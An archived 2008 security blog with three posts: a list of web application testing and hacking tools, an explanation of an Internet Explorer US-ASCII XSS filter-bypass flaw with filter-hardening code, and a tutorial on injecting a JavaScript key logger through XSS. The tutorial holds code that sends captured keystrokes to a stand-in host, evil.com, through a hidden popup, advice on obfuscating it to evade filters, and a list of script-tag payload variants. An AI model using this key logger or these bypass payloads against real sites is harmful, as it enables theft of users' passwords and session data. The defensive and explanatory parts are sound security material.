Archive for June, 2008

Web Hacking Web app security tools…


Introduction

This post is a living list of current web application security testing tools:

Web scanners:

WebInspect : A Powerful Web Application Scanner SPI Dynamics’ WebInspect application security assessment tool helps identify known and unknown vulnerabilities within the Web application layer. WebInspect can also help check that a Web server is configured properly, and attempts common web attacks such as parameter injection, cross-site scripting, directory traversal, and more.[1]

NTOSpider is the first next-generation web application vulnerability scanner, providing automated vulnerability assessment with unprecedented accuracy and comprehensiveness. Able to quickly scan and analyze large complex web sites/applications, NTOSpider identifies application vulnerabilities as well as site exposure risk, ranks threat priority, produces highly graphical, intuitive HTML reports, and indicates site security posture by vulnerabilities and threat exposure.[24]

Acunetix Web Vulnerability Scanner : Commercial Web Vulnerability Scanner Acunetix WVS automatically checks your web applications for vulnerabilities such as SQL Injection, cross site scripting, and weak password strength on authentication pages. Acunetix WVS boasts a comfortable GUI and an ability to create professional website security audit reports.[1]

Nikto : A more comprehensive web scanner Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). It uses Whisker/libwhisker for much of its underlying functionality. It is a great tool, but the value is limited by its infrequent updates. The newest and most critical vulnerabilities are often not detected.[1]

Whisker/libwhisker : Rain.Forest.Puppy's CGI vulnerability scanner and library Libwhisker is a Perl module geared towards HTTP testing. It provides functions for testing HTTP servers for many known security holes, particularly the presence of dangerous CGIs. Whisker is a scanner that used libwhisker but is now deprecated in favor of Nikto, which also uses libwhisker.[1]

Wikto : Web Server Assessment Tool Wikto is a tool that checks for flaws in webservers. It provides much the same functionality as Nikto but adds various interesting pieces of functionality, such as a Back-End miner and close Google integration. Wikto is written for the MS .NET environment and registration is required to download the binary and/or source code.[1]

N-Stealth : Web server scanner N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as Whisker/libwhisker and Nikto, but do take their web site with a grain of salt. The claims of “30,000 vulnerabilities and exploits” and “Dozens of vulnerability checks are added every day” are highly questionable. Also note that essentially all general VA tools such as Nessus, ISS Internet Scanner, Retina, SAINT, and Sara include web scanning components. They may not all be as up-to-date or flexible though. N-Stealth is Windows only and no source code is provided.[1]

ScanDo : The ScanDo web application scanner allows the enterprise to conduct ongoing risk assessments to identify the vulnerability of Web applications to hostile attack. It identifies security weaknesses in the Web applications environment and helps eliminate them before they are exploited by hackers and thieves. It scans Web application technologies, including Flash, JavaScript, ASP, XML and Web Services. ScanDo offers control of both automated and manual scanning as well as the ability to replay discovered vulnerabilities to conduct in-depth analysis.

It supports a database for all scanning results with Web reporting for centralized management, and it provides privacy through detection of Social Security and credit card numbers. ScanDo offers a three-stage process for application risk assessment. First, it explores the entire Web application environment and registers its structure and contents. Then it mimics actual hacking methods to identify and uncover the details of any point that is susceptible to attack. In the third stage, ScanDo outputs all scan results into reports that show how to eliminate vulnerabilities.[2]

VForce is a web application security scanner that simulates attacks for the purpose of testing and analysing a web application for security weaknesses. Like other tools it scans for buffer overruns, manipulation of HTTP requests, brute force vulnerabilities, etc.[2]

ratproxy is a semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.[19]

Goolag Scanner is a standalone Windows GUI-based application.

1. Configuration. gS uses one XML-based configuration file for its settings (see Settings).

2. Data-House-holding. All dorks coming with the distribution of gS are kept inside one file, which resides in {$Goolag Scanner-Installation Directory}/DorkData/gdorks.xml. The name gdorks.xml is predefined from the configuration (see above).[22]

Grendel-Scan is an open-source web application security testing tool. It has an automated testing module for detecting common web application vulnerabilities, and features geared at aiding manual penetration tests. The only system requirement is Java 5; Windows, Linux and Macintosh builds are available.[23]

APACHE_USERS: Apache username enumerator, via /~username requests. This script uses a list of common system names like root, admin etc … You should manually check the issue to establish the HTTP return code (e.g. 403), as this is needed for the command line. No native SSL support.[7]

nnikto is a console app to perform forced browsing checks against a web server. The application uses a simple algorithm and various techniques to prevent/reduce false positives.[25]

Manual security testing:

Paros proxy : A web application vulnerability assessment proxy A Java based web proxy for assessing web application vulnerability. It supports editing/viewing HTTP/HTTPS messages on-the-fly to change items such as cookies and form fields. It includes a web traffic recorder, web spider, hash calculator, and a scanner for testing common web application attacks such as SQL injection and cross-site scripting.[1]

WebScarab : A framework for analyzing applications that communicate using the HTTP and HTTPS protocols In its simplest form, WebScarab records the conversations (requests and responses) that it observes, and allows the operator to review them in various ways. WebScarab is designed to be a tool for anyone who needs to expose the workings of an HTTP(S) based application, whether to allow the developer to debug otherwise difficult problems, or to allow a security specialist to identify vulnerabilities in the way that the application has been designed or implemented.[1]

Burpsuite : An integrated platform for attacking web applications Burp suite allows an attacker to combine manual and automated techniques to enumerate, analyze, attack and exploit web applications. The various burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.[1]

SPIKE Proxy : HTTP Hacking Spike Proxy is an open source HTTP proxy for finding security flaws in web sites. It is part of the Spike Application Testing Suite and supports automated SQL injection detection, web site crawling, login form brute forcing, overflow detection, and directory traversal detection.[1]

CAL9000: CAL9000 brings together a host of web application security testing tools into one convenient package. It is designed to be used in the Firefox browser. CAL9000 functionality may be limited when used with other browsers.[11]

httpedit: httpedit is a 'low-level' interface to HTTP. The application allows you to write a raw HTTP request, send it against a web server and review the response, all from within the same app.[11]

Decompilers:

Jad is a Java decompiler, i.e. a program that reads one or more Java class files and converts them into Java source files which can be compiled again.[3]

Jad can be used:

  • for recovering lost source codes;
  • for exploring the sources of Java runtime libraries;
  • as a Java disassembler;
  • as a Java source code cleaner and beautifier. just kidding

Web session analyzers:

Stompy is an advanced utility to test the quality of WWW session identifiers and other tokens that are meant to be unpredictable. It is fully automated, employs a remarkably advanced collection of tests, and probably scratches an important pen-testing itch.[4]

Web fuzzers:

PROTOS HTTP-reply – Another fuzzer from the PROTOS dudes for attacking HTTP responses, useful for browser vulns.[5]

Screaming Cobra - Name makes the fuzzer sound better than it really is, but is good for finding CGI bugs. Also, it's a Perl script so easy to modify or extend.[5]

Mangle – A fuzzer for generating odd HTML tags, it will also autolaunch a browser. Mangle found the infamous IFRAME IE bug.[5]

FUZZLED: Fuzzled is a powerful fuzzing framework. Fuzzled includes helper functions, namespaces, and factories which allow a wide variety of fuzzing tools to be developed. Fuzzled comes with several example protocols and drivers for them. This most recent release includes:

  • Support for a raft of additional protocols, including HTTPInject, NNTP, SMTP and IMAP.
  • New and improved namespaces.
  • Improvements to the pattern factory.
  • Documentation on writing a fuzzer in Fuzzled.
  • Numerous bugfixes and other minor improvements.[7]

RFuzz is a Ruby library to easily test web applications from the outside using a fast HttpClient and wicked evil RandomGenerator allowing the average programmer to use advanced fuzzing techniques for just pennies a day.[16]

Ajax Security:

Spajax is a .NET Ajax security scanning tool from OWASP.[6]

XSS exploiting

XSSshell: XSS Tunnel is a proxy which allows you to traffic any HTTP traffic through a Cross-site Scripting (XSS) Channel opened by XSS Shell. This release includes a new version of XSS Shell, XSS Tunnel and source codes. Please refer to the white paper for details.[7]

XSSSHELL: XSS Shell is a powerful XSS backdoor. XSS Shell allows interactively getting control over a Cross-site Scripting (XSS) vulnerability in a web application. Demonstrates the real power and damage of Cross-site Scripting attacks.[7]

SQL injection exploiting

SqlServerDataExtractor: Sometimes we need to drop a binary onto a box and extract the data. This application allows you to specify the connection string and SQL statement. Once the SQL statement is executed, the data is output to a file in the application directory, which is loaded into a browser control on the second tab. The reason for using HTML to display the data is that the application should be flexible enough to handle a lot of data.[25]

SSL enumeration & exploitation

ManySSL: Primarily a tool for Linux users to enumerate the SSL ciphers in use on any SSL encrypted service, including mail servers that utilise STARTTLS. This tool has an option to identify only the weak ciphers (ciphers under 128 bit) so administrators can know which ciphers to remove from their service.[7]

SSLDigger v1.02 Released 8/26/2004. Copyright 2004 (c) by Foundstone, Inc. SSLDigger v1.02 is a tool to assess the strength of SSL servers by testing the ciphers supported. Some of these ciphers are known to be insecure.[8]

THCIISSLame version 0.2 IIS 5 SSL remote root exploit. Uses a connect back shell. [13]

THC SSL Check is a small tool that checks the remote SSL stack for supported ciphers and versions. Useful for pentesting for weak SSL configuration discovery.[13]

THCSSLProxy: THCSSLProxy is a small command-line SSL proxy for Windows that is useful for penetration testing SSL services like HTTPS, SMTPS, LDAPS, POP3S, and more.[13]

sslciphercheck: a new console tool to check supported SSL ciphers. It will also retrieve and extract the certificate information, including whether Server Gated Cryptography (SGC) is supported. The main problem with existing tools, e.g. SSLDigger and thcsslcheck, is that they either don't support SSLv2 or they don't retrieve the certificate information, so you cannot tell if Server Gated Cryptography is supported. sslciphercheck is designed to overcome these issues.[25]

Web Service scanner

WSDigger v1.0 Released 7/12/2005. Copyright 2005 (c) by Foundstone, Inc. WSDigger is a free open source tool designed by Foundstone to automate black-box web services security testing (also known as penetration testing). WSDigger is more than a tool, it is a web services testing framework. Version one of this framework contains sample attack plug-ins for SQL injection, cross site scripting and XPATH injection attacks. A web service vulnerable to XPATH injection is provided as an example with the tool. By releasing the framework as an open-source tool, users are encouraged to develop and share their own plug-ins. System requirements: Windows, .NET Framework.[9]

Http probers

hoppy: Hoppy (*[H]ttp [O]ptions [P]rober In [PY]thon*) is an HTTP server method prober written in Python; it does exactly what it says on the tin. It tests HTTP methods for configuration issues leaking information, or just to see if they are enabled. Latest version is 1.5.1.[7]

httprint:httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings, or by plug-ins such as mod_security or servermask.

THCSSLProxy: Small command-line SSL proxy for Windows, useful for pentesting SSL services like HTTPS, SMTPS, LDAPS, POP3S etc.[12]

Web spiders:

SiteDigger v2.0 Released 1/06/2005. Copyright 2005 (c) by Foundstone, Inc. SiteDigger 2.0 searches Google's cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on web sites.[10]
What’s New in SiteDigger 2.0

* 10 times more results! Now you can use FSDB / GHDB and generate 10 results per signature.
* Improved user interface, help file, signature update and results page.
* Decreased false positives.
* Latest signatures (open webcams, credit card numbers, etc).
* Ability to raw search.

Aura: A while back Google encouraged developers to make use of their API. Many people built applications around the API, but alas Google has stopped issuing API keys. This means that those applications (like Wikto etc.) lost large portions of their functionality. SensePost AURA (Api Usable / Re-usable Again) will help to get those tools working again. Aura is a very simple web app that runs as an executable on your Windows machine and listens on 127.0.0.1:80.[11]

HTTrack: HTTrack is a free and easy-to-use offline browser utility. It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer.

Web brute forcers:

WWWhack is a brute force utility that will try to crack web sites guarded by a web access password. This utility can use a word file or try all possible combinations, and by trial-and-error, will attempt to find a combination of username/password that is accepted by the web server.[14]

Database enumeration

Sqlmap is an automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL SELECT statement, read specific files on the file system and much more.[18]

Frameworks

ProxMon is an extensible Python based framework that reduces testing effort, improves consistency and reduces errors. Its use requires limited additional effort as it processes the proxy logs that you're already generating and reports discovered issues. In addition to penetration testing, ProxMon is useful in QA, developer testing and regression testing scenarios.[20]

Pantera uses an improved version of SpikeProxy to provide a powerful web application analysis engine.[21]

Reference [1]:http://sectools.org/web-scanners.html

Reference [2]:http://www.windowsecurity.com/software/Web-Application-Security/

Reference [3]:http://www.kpdus.com/jad.html#general

Reference [4]:http://lcamtuf.coredump.cx/

Reference [5]:http://www.infosecinstitute.com/blog/2005/12/fuzzers-ultimate-list.html

Reference [6]:http://cvs.drupal.org/viewvc.py/drupal/contributions/modules/spajax/

Reference [7]: http://www.portcullis.co.uk/16.php

Reference [8]:http://www.foundstone.com/us/resources/proddesc/ssldigger.htm

Reference [9]:http://www.foundstone.com/us/resources/proddesc/wsdigger.htm

Reference [10]:http://www.foundstone.com/us/resources/proddesc/sitedigger.htm

Reference [11]:http://www.hacktoolrepository.com/category.pl?cid=8&categoryname=Web%20applications

Reference [12]:http://freeworld.thc.org/root/tools/

Reference [13]:http://packetstormsecurity.org/groups/thc/index5.html

Reference [14]:http://www.darknet.org.uk/2006/12/wwwhack-19-download-wwwhack19zip-web-hacking-tool/

Reference [15]:http://www.infosecinstitute.com/blog/2005/12/fuzzers-ultimate-list.html

Reference [16]:http://rfuzz.rubyforge.org/

Reference [17]:http://www.gnucitizen.org/blog/web-client-fuzzer_py/

Reference [18]:http://sqlmap.sourceforge.net/

Reference [19]:http://code.google.com/p/ratproxy/

Reference [20]:http://www.isecpartners.com/proxmon.html

Reference [21]:http://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project

Reference [22]: http://www.goolag.org/specifications.html

Reference [23]: http://www.grendel-scan.com/

Reference [24]: http://www.ntobjectives.com/products/ntospider.php

Reference [25]: http://www.woany.co.uk

XSS Hacking Bypassing XSS web filters by using US ASCII encoding…


Introduction

Not a few articles have been written about the subject of this article. What I am going to comment on, as you have already guessed, is US-ASCII encoding used to bypass web filters. When I initially came across this vulnerability (actually I did not find it, someone else did; I just think it is interesting), I thought it was going to have a mass impact on all web sites, but unfortunately or fortunately it does not. Anyway, the issue is that the ASCII character set encodes every character with 7 bits. Internet connections transmit octets with 8 bits. If the content of such a transmission is encoded in ASCII, the most significant bit must be ignored.

The Security problem

Of the tested browsers Firefox 1.5 and above, Opera 8.5 and above and Internet Explorer 6 and 7, only the Internet Explorer versions do this correctly; the others evaluate the bit and display the characters as if they were from the character set ISO-8859-1. Although the behavior of Internet Explorer is the correct one, this creates a security risk: the author of a web page can set the bit on arbitrary characters without changing the look of the page. But virus scanners and content filters see completely different characters, so these programs cannot detect viruses or spam. [1]

What do we mean by saying US-ASCII

There are several national variants of ASCII. In such variants, some special characters have been replaced by national letters (and other symbols). There is great variation here, and even within one country and for one language there might be different variants. The original ASCII is therefore often referred to as US-ASCII; the formal standard (by ANSI) is ANSI X3.4-1986.[5]

The name ASCII, originally an abbreviation for “American Standard Code for Information Interchange”, denotes an old character repertoire, code, and encoding.

Most character codes currently in use contain ASCII as their subset in some sense. ASCII is the safest character repertoire to be used in data transfer. However, not even all ASCII characters are “safe”!

ASCII has been used and is used so widely that often the word ASCII refers to “text” or “plain text” in general, even if the character code is something else! The words “ASCII file” quite often mean any text file as opposite to a binary file.

The phrase "original ASCII" is perhaps not quite adequate, since the creation of ASCII started in the late 1950s, and several additions and modifications were made in the 1960s. The 1963 version had several unassigned code positions. The ANSI standard, where those positions were assigned, mainly to accommodate lower case letters, was approved in 1967/1968, and later modified slightly. For the early history, including pre-ASCII character codes, see Steven J. Searle's A Brief History of Character Codes in North America, Europe, and East Asia and Tom Jennings' ASCII: American Standard Code for Information Infiltration. See also Jim Price's ASCII Chart, Mary Brandel's 1963: ASCII Debuts, and the computer history documents, including the background and creation of ASCII, written by Bob Bemer, "father of ASCII".[5]

The explanation

Let's say for example that we want to see if a website is encoding or filtering the < character. What someone would do is inject < and see what the web application returns.

Now if the web app returns something like < or < then the web application is probably not vulnerable to XSS. But if the web app is using US-ASCII, things change for IE6/7: IE processes US-ASCII encoded content with the most significant bit set as if the bit were not there. To get IE to process the < character, for example, first convert < to hex (0x3c) and add 0x80 (0x3c + 0x80 = 0xbc), then URL-encode the result. The < character is therefore equivalent to %bc, which IE6/7 accept as a valid encoding.

This offers spammers and virus writers the possibility to bypass installed spam and virus filters. We checked several filter products and all of these failed to detect the manipulated web pages. But it should be quite easy to close this hole by clearing the most significant bit on ASCII encoded web pages before analyzing them.

The JavaScript code:

<script>alert("This is some obfuscated script!");</script>

Here is some C# code that removes the most significant bit from the JavaScript:

using System;
using System.IO;

int char1;
char c1;
// "[file path]" is a placeholder for the file containing the high-bit encoded page
FileStream fs = new FileStream("[file path]", FileMode.Open);
BinaryReader r = new BinaryReader(fs);

r.BaseStream.Seek(0, SeekOrigin.Begin);

while (r.BaseStream.Position < r.BaseStream.Length)
{
    char1 = r.ReadByte();
    char1 = char1 & 0x7F;   // clear the most significant bit (0x80) of every byte
    c1 = (char)char1;
    Console.Write(c1);
}

Code example 1:Removing most significant bit [2].
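The same normalization as a filter check, as an added example that is not code from the original post or from reference [2]: a naive tag filter that decodes the body as ISO-8859-1 (the way Firefox and Opera did) misses the high-bit form of `<script>`, while a filter that first clears the MSB on content declared as US-ASCII sees what IE6/7 will render. The sample payload is constructed from the post's own `<` to `%bc` transformation; `msb_encode`, `strip_msb` and the two filter functions are names assumed here.

```python
import re
from urllib.parse import quote


def msb_encode(text: str) -> bytes:
    """Set the high bit on every 7-bit ASCII byte (0x3c '<' becomes 0xbc)."""
    return bytes(b | 0x80 for b in text.encode("ascii"))


def strip_msb(data: bytes) -> str:
    """Clear the high bit on every byte, as a decoder that honours 7-bit
    US-ASCII does. This is the normalization the post recommends for filters."""
    return bytes(b & 0x7F for b in data).decode("ascii")


# Matches an opening or closing <script> tag.
TAG_RE = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def naive_filter_blocks(data: bytes) -> bool:
    """Filter that decodes the body as ISO-8859-1 and looks for a literal
    <script> tag. Bytes 0xbc/0xbe decode to '¼' and '¾', so the tag is missed."""
    return TAG_RE.search(data.decode("latin-1")) is not None


def hardened_filter_blocks(data: bytes, declared_charset: str) -> bool:
    """Same check, but for content declared as US-ASCII the high bit is cleared
    first, so the body is scanned the way IE6/7 will actually interpret it."""
    if declared_charset.lower() in ("us-ascii", "ascii"):
        text = strip_msb(data)
    else:
        text = data.decode("latin-1")
    return TAG_RE.search(text) is not None


# Constructed sample: the post's JavaScript with the high bit set on every byte.
PLAIN = '<script>alert("This is some obfuscated script!");</script>'
HIGH_BIT = msb_encode(PLAIN)


def demo() -> dict:
    """Run both filters over the plain and the high-bit payload."""
    return {
        # URL-encoded form of '<' with the high bit set (the post writes it %bc)
        "url_encoded_lt": quote(bytes([ord("<") | 0x80])),
        "naive_blocks_plain": naive_filter_blocks(PLAIN.encode("ascii")),
        "naive_blocks_high_bit": naive_filter_blocks(HIGH_BIT),
        "hardened_blocks_high_bit": hardened_filter_blocks(HIGH_BIT, "US-ASCII"),
        "normalized": strip_msb(HIGH_BIT),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```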

NOTE1: there has been significant discussion about this issue, and as of 20060625, it is not clear where the responsibility for this issue lies, although it might be due to vagueness within the associated standards.[3]

NOTE2: this might only be exploitable with certain encodings.[3]

Impact

CVSS Severity (version 2.0 upgrade from v1.0):
CVSS v2 Base score: 2.6 (Low) (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Impact Subscore: 2.9
Exploitability Subscore: 4.9 [3]

Access Vector: Network exploitable, victim must voluntarily interact with attack mechanism
Access Complexity: High
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification [3]

Current situation

I'm happy to report that IE8 is delivering additional XSS-Focused Attack Surface Reduction goodness. For Beta 1 you will notice a small but notable step forward: the US-ASCII XSS attack vector has now been closed.[4]

References to Advisories, Solutions, and Tools [3]

XF: ie-ascii-encoded-web-filter-bypass(27288)
http://xforce.iss.net/xforce/xfdb/27288

BUGTRAQ: 20060623 Re: Bypassing of web filters by using ASCII
http://www.securityfocus.com/archive/1/archive/1/438163/100/0/threaded

BUGTRAQ: 20060623 RE: Bypassing of web filters by using ASCII
http://www.securityfocus.com/archive/1/archive/1/438154/100/0/threaded

BUGTRAQ: 20060622 Re: Bypassing of web filters by using ASCII
http://www.securityfocus.com/archive/1/archive/1/438066/100/0/threaded

BUGTRAQ: 20060621 Re: Bypassing of web filters by using ASCII
http://www.securityfocus.com/archive/1/archive/1/438049/100/0/threaded

BUGTRAQ: 20060621 Bypassing of web filters by using ASCII
http://www.securityfocus.com/archive/1/archive/1/437948/100/0/threaded

BUGTRAQ: 20060621 Re: Bypassing of web filters by using ASCII
http://www.securityfocus.com/archive/1/438051/100/0/threaded

http://ha.ckers.org/blog/20060621/us-ascii-xss-part-2

BUGTRAQ: 20060626 RE: Bypassing of web filters by using ASCII
http://www.securityfocus.com/archive/1/archive/1/438359/100/0/threaded

BUGTRAQ: 20060626 Re: Bypassing of web filters by using ASCII
http://www.securityfocus.com/archive/1/archive/1/438358/100/0/threaded

OSVDB: 28376
http://www.osvdb.org/28376

http://ha.ckers.org/blog/20060621/malformed-ascii-bypasses-filters/

Vulnerable software and versions

Configuration 1: Microsoft Internet Explorer 6.0.2900

Reference[1]:http://www.iku-ag.de/sicherheit/ascii-eng.jsp

Reference[2]:http://blogs.msdn.com/dross/archive/2006/10/01/780339.aspx

Reference[3]:http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-3227

Reference[4]:http://blogs.msdn.com/dross/archive/2008/03/10/xss-focused-attack-surface-reduction.aspx

Reference[5]:http://www.cs.tut.fi/~jkorpela/chars.html#examples

XSS Hacking Smashing the Web for fun & profit using XSS


Introduction

This article is dedicated to all these people that believe XSS is not a serious Web application vulnerability. Using XSS vulnerabilities someone can actually make lots of money. I don't have any responsibility for how this knowledge is going to be used; this article was created out of love of hacking and not to hack other people's sites. Recently I became very interested in XSS and decided to write an article that fully explains how to inject a JavaScript key logger, and by "fully explain" I mean describe in full detail how someone can perform XSS filter evasion and run my JavaScript key logger in order to steal user names, passwords and user credentials. The scary part is that you don't have to be a JavaScript expert to write effective malicious JavaScript code, you just have to have a good understanding of the Web. In the following article I provide the reader with two flavors of practically the same JavaScript key logger.

In order to understand this article you have to know:

  1. How to write HTML web forms (look at [4]).
  2. How to write JavaScript DOM objects (look at [3]).
  3. Basic functionality of the HTTP protocol (look at [1]).
  4. Understand what JavaScript obfuscation is (have a look at [5]).
  5. Understand how to use Burp Suite 1.1 (look at [6]).

The functionality of your XSS

Before you exploit an XSS you have to understand what functionality the XSS exploit should have. By functionality I mean the purpose of your XSS, e.g. to deface a website, to cause a redirect, or to steal user credentials (the most interesting one!!). In our situation we are going to write a key logger XSS. So we have to think about what a log-in form looks like from the user's perspective: for example, what is the average user name and password length? And how fast does an average user type? We are going to use this information to build two flavors of JavaScript key loggers that run in IE, Firefox, Opera and Netscape. Our program is going to steal the user credentials based on time (e.g. auto execute after a certain amount of time), password length (e.g. auto execute after the user types 5 characters), or both time and password length (e.g. perhaps with some character mapping, like checking whether the Enter or Tab keys have been pressed).

How fast do you type?

Why should we think about this factor? Because we have to make our key logger more effective. For the purposes of WPM measurement a word is standardized to five characters or keystrokes. In one study of average computer users, the average rate for transcription was 33 words per minute, and only 19 words per minute for composition.[8] In the same study, when the group was divided into "fast", "moderate" and "slow" groups, the average speeds were 40 wpm (words per minute), 35 wpm, and 23 wpm respectively. Two-finger typists, sometimes also referred to as "Hunt-and-Peck" typists, can reach speeds of about 37 wpm for memorized text, and 27 wpm when copying text.[9]

An average typist reaches 50 to 70 wpm, while some positions can require 80 to 95 (usually the minimum required for dispatch positions and other typing jobs), and some advanced typists work at speeds above 120.[7]

Using a personalized interface, quadriplegic physicist Stephen Hawking managed to type 15 wpm with a switch and adapted software created by Walt Woltosz. Due to a slowdown of his motor skills, his interface was upgraded with an infrared camera that detects eye blinks. The actual wpm is unknown.[7]

What is your average password and user name length?

That is truly a hard question to answer because data is scarce. But recently, some spoils from a MySpace phishing attack, 34,000 actual user names and passwords, revealed some truths.[10] The attack was pretty basic. The attackers created a fake MySpace login page, and collected login information when users thought they were accessing their own account on the site. The data was forwarded to various compromised web servers, where the attackers would harvest it later.[10]

MySpace estimates that more than 100,000 people fell for the attack before it was shut down. The data I have is from two different collection points, and was cleaned of the small percentage of people who realized they were responding to a phishing attack. I analyzed the data, and this is what I learned.[10]

Password Length:

While 65% of passwords contain eight characters or less, 17% are made up of six characters or less. The average password is eight characters long.[10]

Specifically, the length distribution looks like this:

1-4 0.82%
5 1.1%
6 15%
7 23%
8 25%
9 17%
10 13%
11 2.7%
12 0.93%
13-32 0.93%

Character Mix: While 81% of passwords are alphanumeric, 28% are just lowercase letters plus a single final digit — and two-thirds of those have the single digit 1. Only 3.8% of passwords are a single dictionary word, and another 12% are a single dictionary word plus a final digit — once again, two-thirds of the time that digit is 1.

numbers only 1.3%
letters only 9.6%
alphanumeric 81%
non-alphanumeric 8.3%

Make some use of the information we have

We can now see that the password length is very probably 8 characters, and if we assume that the user name is 7 characters, then, because an average person types 37 wpm of memorized text and passwords are memorized text, that means that:

Username + Password = 15 characters approximately

One word = 5 characters

Which means that Username + Password = Three words so:

37/3 = 1/x => 37x = 1 => x =1/37 Minutes

or x = 1/37 * 60000 Milliseconds = 1621 Milliseconds (I will explain later why you need milliseconds)

Now we know how much time the average user takes to type his user name and password; we also know that he might press the Tab or Enter key to switch between text fields and to send the form data. So after the user enters the login page the key logger is going to check the time, the Enter key and the length of the password.

Now let's start with our key logger. In our key logger we have to use the DHTML keypress event, which we are going to have to inject somehow into the form, the setTimeout JavaScript function and the window object, calling the window.open method to execute our code (so that the user won't be redirected to another page, as would happen if we used the document.location DOM object; alternatively we can use the document object, steal the password and then perform a phishing attack).

The key logger can become more efficient if we know the password security policy of the web site we are trying to exploit, because if for example the password consists of three letters, two special characters and three numerical characters we can design the key logger so that it detects the format of the password and executes itself after it detects what you are typing (by checking the length or the characters); the same is valid for the user name.

First version of our JavaScript key logger….

The version of the key logger presented below is not the most efficient; we are going to make lots of modifications throughout this article. So our first key logger is an easy code example to understand the basics; let's not worry for now about how we are going to inject the JavaScript and just focus on making functional code first. In the code below we set two variables, counter and arrayOfChars: the first variable is going to count how many key presses the user made and the second variable is going to hold all our characters until we send them. To send the characters we recorded we are going to use the object document.location, but that means that the user is going to be redirected from the original web page to another web page! That is ok for the first version of our key logger, for simplicity's sake!

Code


Code example1: A simple version of the key logger, using as a condition to execute the recording of three letter word.

Second version of our JavaScript key logger….

So our code is going to execute conditionally, but what about making it more efficient as well? Well, if we use the setTimeout JavaScript function we can get more effective results by making valid assumptions about how long it is going to take to type the user name and the password (using the data displayed above!).

So here is how setTimeout works!

setTimeout()

window.setTimeout() allows you to specify that a piece of JavaScript code (called an expression) will be run a specified number of milliseconds from when the setTimeout() method was called. The general syntax of the method is:[11]

setTimeout ( expression, timeout );

where expression is the JavaScript code to run after timeout milliseconds have elapsed.[11]

setTimeout() also returns a numeric timeout ID that can be used to track the timeout. This is most commonly used with the clearTimeout() method (see below).[11]

Here’s a simple example:

<input type="button" name="clickMe" value="Click me and wait!" onclick="setTimeout('alert(\'Surprise!\')', 5000)"/> [11]

Here is the html form that uses the onkeypress event:

Html form....

Code example2: Html text box

The above code is going to execute our keyLogger function each time a key is pressed. Now our function is using a global variable called counter that stores the values until the user navigates to another web page!

When we inject our code, we have to override the event in the web form (if one exists!). This means that we have to insert our code before the event and comment out the rest of the code! (I will explain all about it later.) The code expression we are going to write uses the JavaScript timeout like this:

function autoTrigger() { setTimeout('sentData()', 1621); }

Code example3: This function is going to replace function sentData in line 28 in code example 1

The html code in code example 2 won't change at all; we only have to change line 28, and our code is going to auto trigger after 1621 milliseconds and only if the word entered in the text box is longer than 3 characters....

To make our logger more interesting we have to change both the execution conditions and the html form input. We will detect the Enter key and assume that the combined length of the user name and password is 15 characters.......

To do that we only have to change the sentData() function and make it look like this:

function sentData(_keyNum) {
  if (arrayOfCharsToSent.length <= 15 && _keyNum == 13) { // 13 is the key code of Enter (carriage return)
    var new_Win = window.open('http://www.evil.com/cgi?' + arrayOfCharsToSent.toString(),
                              'jav',
                              'menubar=no,toolbar=no,scrollbars=no,width=1,height=1,resizable=yes');
    new_Win.blur(); // This call pushes the popup window behind the main window
  }
}

Now our key logger would look like this:

More modifications to the code

Now we have to optimize, compress and obfuscate our code in order to evade the web filters, so after some processing the code will look like this:

Now our code is shortened and ready to be obfuscated. To obfuscate the code we will have to use an online tool. The Online JavaScript Obfuscator renames local variables and the arguments of functions and methods, but does not rename JavaScript core and client-side functions, constructors, methods or properties. It is compatible with Core JavaScript, Client-Side JavaScript, W3C DOM, XML, XML Schemas (SOM), XSLT, AJAX (XMLHTTP) and other third party objects. You may decide whether to rename your own global variables, functions, constructors, methods and properties in the source code, according to the obfuscating rules. The obfuscator we are going to use is http://iframe.in/.[12]

But first we are going to compress the code further:

And now we will obfuscate the code using iframe.in :


Analyzing our needs

The above image shows the options the obfuscator gave us to evade the filter. By that I mean that first we have to probe the filter to see what sort of encoding or filtering it does (e.g. which characters it removes). Now the only obvious issue here is the script tags, meaning that our tool did not encode the <script> tag. This means that we have to use other tricks to bypass filters that remove the script tag. Let's assume for now that the imaginary filters accept single quotes and parenthesis characters; with this assumption we can successfully use the Unicode and Unescape attacks.

Bypassing the script tag issue

Below I list possible script tag alterations that I found in the XSS cheat sheet and some that I have been using for probing XSS filters:

  1. <script>alert(document.cookie)</script>
  2. <script>alert(document.cookie);</script>
  3. <script>alert("XSS")</script>
  4. <script >alert(document.cookie)</script >
  5. <script>alert(String.fromCharCode(88,83,83))</script>
  6. <script/*aaaaaa*/>/*aaaaa*/alert(String.fromCharCode(88,83,83))/*aaaaa*/</script/*aaaaa*/>
  7. <script/**/>/**/alert(String.fromCharCode(/**/88,/**/83,/**/83))/**/</script/*aaaaa*/>
  8. <script/**/>/**/alert('/**/XSS/**/')/**/</script/*aaaaa*/>
  9. <script/**/>/**/alert("/**/XSS/**/")/**/</script/*aaaaa*/>
  10. <script type="text/JavaScript">alert(document.cookie)</script>
  11. <script language="JavaScript" type="text/JavaScript">alert(document.cookie)</script>
  12. <script language="JavaScript" type="text/JavaScript">alert(document.cookie)</script>
  13. <script language="JaVaScRiPt" type="text/JavaScript">alert(document.cookie)</script>
  14. <script language="JaVaScRiPt">alert(document.cookie)</script>
